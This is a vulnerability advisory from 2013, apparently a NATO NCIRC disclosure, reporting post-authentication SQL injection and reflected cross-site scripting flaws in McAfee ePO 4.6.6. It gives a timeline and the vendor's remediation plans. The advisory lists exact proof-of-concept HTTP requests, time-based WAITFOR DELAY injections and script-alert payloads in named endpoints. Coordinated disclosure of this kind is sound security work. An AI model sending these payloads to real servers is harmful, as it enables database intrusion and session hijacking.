McAfee ePO 4.6.6 Cross Site Scripting / SQL Injection

`Classification: NON SENSITIVE INFORMATION RELEASABLE TO THE PUBLIC  
  
  
Multiple vulnerabilities in McAfee ePO 4.6.6  
  
Affected Product:  
McAfee ePO 4.6.6 Build 176 & (potentially) earlier versions  
  
Timeline:  
  
08 June 2013 - Vulnerability found  
12 June 2013 - Vendor informed  
12 June 2013 - Vendor replied/confirmed & opened service ticket  
12 July 2013 - Vendor responded with dates for solutions  
  
Credits:  
Nuri Fattah of NATO / NCIRC (www.ncirc.nato.int)  
  
CVE: To be assigned  
  
NCIRC ID: NCIRC-2013127-01  
  
Description:  
Multiple vulnerabilities, such as Cross-Site Scripting (XSS) and SQL  
injection were identified in the latest version of McAfee ePO (4.6.6).  
All identified vulnerabilities were discovered post authentication.  
  
  
Vulnerability Details:  
  
1. SQL injection  
  
a. GET  
/core/showRegisteredTypeDetails.do?registeredTypeID=epo.rt.computer&uid=6waitf  
or%20delay'0%3a0%3a20'--  
&index=0&datasourceID=&orion.user.security.token=2LoWTAOfWJ4ZCjxY&ajax  
Mode=standard HTTP/1.1  
  
b. /EPOAGENTMETA/DisplayMSAPropsDetail.do?registeredTypeID=epo.rt.computer  
&uid=1;%20WAITFOR%20DELAY%20'0:0:0';--  
&datasourceID=ListDataSource.orion.dashboard.chart.datasource.core.queryFactory  
%3Aquery.2&index=0 HTTP/1.1  
  
McAfee Solution:  
  
Item "a" will be addressed in ePO 4.6.7 due out in late Q3 2013.  
Item "b" has been addressed per Security Bulletin SB10043.  
(https://kc.mcafee.com/corporate/index?page=3Dcontent&id=3DSB10043)  
  
  
  
  
2. Reflected XSS  
a. POST /core/loadDisplayType.do HTTP/1.1=20  
displayType=text_lookup&operator=eq&propKey=EPOLeafNode.AgentVersion&instanceId=<script>alert(182667)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard  
  
b. POST /console/createDashboardContainer.do HTTP/1.1  
displayType=text_lookup&operator=eq&propKey=EPOLeafNode.AgentVersion&instanceId=<script>alert(182667)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard  
  
c. POST /console/createDashboardContainer.do HTTP/1.1  
elementId=3DcustomURL.dashboard.factory%3Ainstance&index=3D2&pageid=3D30&  
width=3D1118&height=3D557&refreshInterval=3D5&refreshIntervalUnit=3DMIN&filteringEnabled=3Dfalse&mo  
nitorUrl=3Dhttp%3A%2F%2Fwww.xxxx.com"/></iframe><script>alert(111057)</script>&orion.user.sec  
urity.token=3D9BslgbJEv2JqQy3k&ajaxMode=3Dstandard  
  
d. GET /ComputerMgmt/sysDetPanelBoolPie.do?uid=1";</script><script>alert(147981)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1  
  
e. GET /ComputerMgmt/sysDetPanelQry.do?uid=<script>alert(149031)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1  
  
f. GET /ComputerMgmt/sysDetPanelQry.do?uid=>"'><script>alert(30629)</script>&orion.user.security.token=>"'><script>alert(30629)</script>&ajaxMode=>"'><script>alert(30629)</script> HTTP/1.1  
  
g. GET /ComputerMgmt/sysDetPanelSummary.do?uid=<script>alert(146243)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1  
  
  
h. GET /ComputerMgmt/sysDetPanelSummary.do?uid=>"'><script>alert(30565)</script>&orion.user.security.token=>"'><script>alert(30565)</script>&ajaxMode=>"'><script>alert(30565)</script> HTTP/1.1  
  
  
McAfee Solution:  
  
Each of these items will be addressed in ePO 4.6.7 due out in late Q3  
2013.  
  
  
  
  
Nuri FATTAH  
CTR  
NATO Communications and Information Agency  
Engineering & Vulnerability Management Sections  
NATO Information Assurance Technical Centre  
SHAPE, 7010 Mons, Belgium  
T: +32 6544 6140 F: +32 6544 5414  
SHAPE NCN: 254 6140  
E: [email protected] W: www.ncirc.nato.int  
  
  
`